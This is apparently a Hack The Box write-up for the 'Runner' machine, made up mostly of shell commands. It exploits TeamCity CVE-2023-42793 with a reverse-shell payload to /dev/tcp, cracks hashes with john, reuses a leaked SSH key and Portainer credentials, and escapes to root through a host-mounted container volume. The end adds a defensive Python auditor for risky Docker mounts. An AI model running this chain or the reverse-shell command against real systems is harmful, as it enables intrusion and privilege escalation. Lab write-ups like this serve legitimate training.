Runner



HTB Linux

nmap -A -p- -oA runner 10.10.11.13 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA runner 10.10.11.13

echo "10.10.11.13 runner.htb teamcity.runner.htb portainer-administration.runner.htb" | sudo tee -a /etc/hosts

![ssh_command](/20240720125353.png)

nmap -sU -O -p- -oA runner-udp 10.10.11.13

ping -c 1 10.10.11.13

![ssh_command](/20240720124946.png)

nmap -p- --open -T5 -v -n 10.10.11.13

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.13 -oG allPorts

![ssh_command](/20240720125448.png)

extractPorts allPorts

nmap -sCV -p22,80,8080 10.10.11.13 -oN targeted

![ssh_command](/20240720125600.png)

bc targeted -l rb

![ssh_command](/20240720125646.png)

whatweb http://10.10.11.13

![ssh_command](/20240720125800.png)

wfuzz -c --hc=404,400,302 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.11.13:8000/FUZZ

![ssh_command](/20240720131326.png)

cewl http://runner.htb -d 2 -w wordlist.txt

wfuzz -c --hc=302,404,403,400 -t 200 -w wordlist.txt -u http://10.10.11.13/ -H "Host: FUZZ.runner.htb"

![ssh_command](/20240720132129.png)

We go to http://teamcity.runner.htb

![ssh_command](/20240720132542.png)

searchsploit teamcity

![ssh_command](/20240720132757.png)

We clone the following:

git clone https://github.com/Zyad-Elsayed/CVE-2023-42793

pip3 install -r requirements.txt

![ssh_command](/20240720133849.png)

I log in with the credentials.

![ssh_command](/20240720134307.png)

python3 rce.py -u http://teamcity.runner.htb -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{10.10.14.3}%2F{5555}%200%3E%261"'

nc -lvnp 5555

https://exploit-notes.hdks.org/exploit/web/teamcity-pentesting/

![ssh_command](/20240720135402.png)

We go to backup.

![ssh_command](/20240720135509.png)

We download the zip.

![ssh_command](/20240720135609.png)

We run the following:

unzip TeamCity_Backup_20240720_1955119.zip

bc users

![ssh_command](/20240720135931.png)

batcat hash

![ssh_command](/20240720145648.png)

![ssh_command](/20240720141132.png)

john --wordlist=/usr/share/wordlists/rockyou.txt hash

![ssh_command](/20240720143820.png)

tree -f | grep -i 'id_rsa'

cp config/projects/AllProjects/pluginData/ssh_keys/id_rsa .

![ssh_command](/20240720143616.png)

chmod 600 id_rsa

ssh -i id_rsa john@runner.htb

![ssh_command](/20240720144319.png)

find / -type f -perm -u=s 2>/dev/null

![ssh_command](/20240720145349.png)

cd /etc/nginx/sites-enabled

cat portainer

![ssh_command](/20240720150008.png)

![ssh_command](/20240720150027.png)

We go to http://portainer-administration.runner.htb

And we log in as the user matthew:piper123

![ssh_command](/20240720150612.png)

We go to Volumes and create a new Volume.

![ssh_command](/20240720151131.png)

We create the following Volume:

![ssh_command](/20240720151410.png)

We create a container.

![ssh_command](/20240720151517.png)

![ssh_command](/20240720151643.png)

![ssh_command](/20240720151711.png)

![ssh_command](/20240720151836.png)

![ssh_command](/20240720151940.png)

Under Images we do the following:

![ssh_command](/20240720152216.png)

We click to create the new container.

We open the console.

![ssh_command](/20240721180032.png)

![ssh_command](/20240721180114.png)

cd /mnt

cat root/root.txt

![ssh_command](/20240721180355.png)
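The root flag is readable because a container was given the host filesystem under /mnt. As an added defender-side example (not part of the original writeup), the script below audits `docker volume inspect` and `docker inspect` JSON for exactly that pattern; it assumes the Portainer Volume above was created with the local driver's bind options (type=none, o=bind, device=<host path>) and also catches direct bind mounts and privileged containers. The sample JSON is constructed, not captured from the box.

```python
import json

# Added example, not from the writeup. Host roots that must not be exposed to a container.
SENSITIVE_ROOTS = ("/", "/etc", "/root", "/home", "/var/run/docker.sock")


def is_sensitive(path):
    """True if path is, or lies under, one of SENSITIVE_ROOTS."""
    path = path.rstrip("/") or "/"
    return any(path == r or (r != "/" and path.startswith(r + "/")) for r in SENSITIVE_ROOTS)


def risky_volumes(volume_inspect_json):
    """Name -> host device for local-driver volumes that bind a host path (o=bind, device=...)."""
    risky = {}
    for v in json.loads(volume_inspect_json):
        opts = v.get("Options") or {}
        if "bind" in opts.get("o", "") and is_sensitive(opts.get("device", "")):
            risky[v["Name"]] = opts["device"]
    return risky


def audit(container_inspect_json, volume_inspect_json):
    """Findings as (container, kind, host_path): privileged flag, direct binds, bind-backed volumes."""
    risky = risky_volumes(volume_inspect_json)
    findings = []
    for c in json.loads(container_inspect_json):
        name = c.get("Name", "?").lstrip("/")
        if c.get("HostConfig", {}).get("Privileged"):
            findings.append((name, "privileged", None))
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and is_sensitive(m.get("Source", "")):
                findings.append((name, "bind", m["Source"]))
            elif m.get("Type") == "volume" and m.get("Name") in risky:
                findings.append((name, "volume-bind", risky[m["Name"]]))
    return findings


# Constructed sample data shaped like `docker volume inspect` / `docker inspect` output.
VOLUMES = json.dumps([
    {"Name": "hostroot", "Driver": "local", "Options": {"type": "none", "o": "bind", "device": "/"}},
    {"Name": "webdata", "Driver": "local", "Options": None},
])
CONTAINERS = json.dumps([
    {"Name": "/escape", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "volume", "Name": "hostroot", "Destination": "/mnt"}]},
    {"Name": "/web", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "volume", "Name": "webdata", "Destination": "/srv"}]},
])
```

Running `audit(CONTAINERS, VOLUMES)` reports only the `escape` container, since a named volume without bind options stays under /var/lib/docker.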

© 2024 Cu3rv0x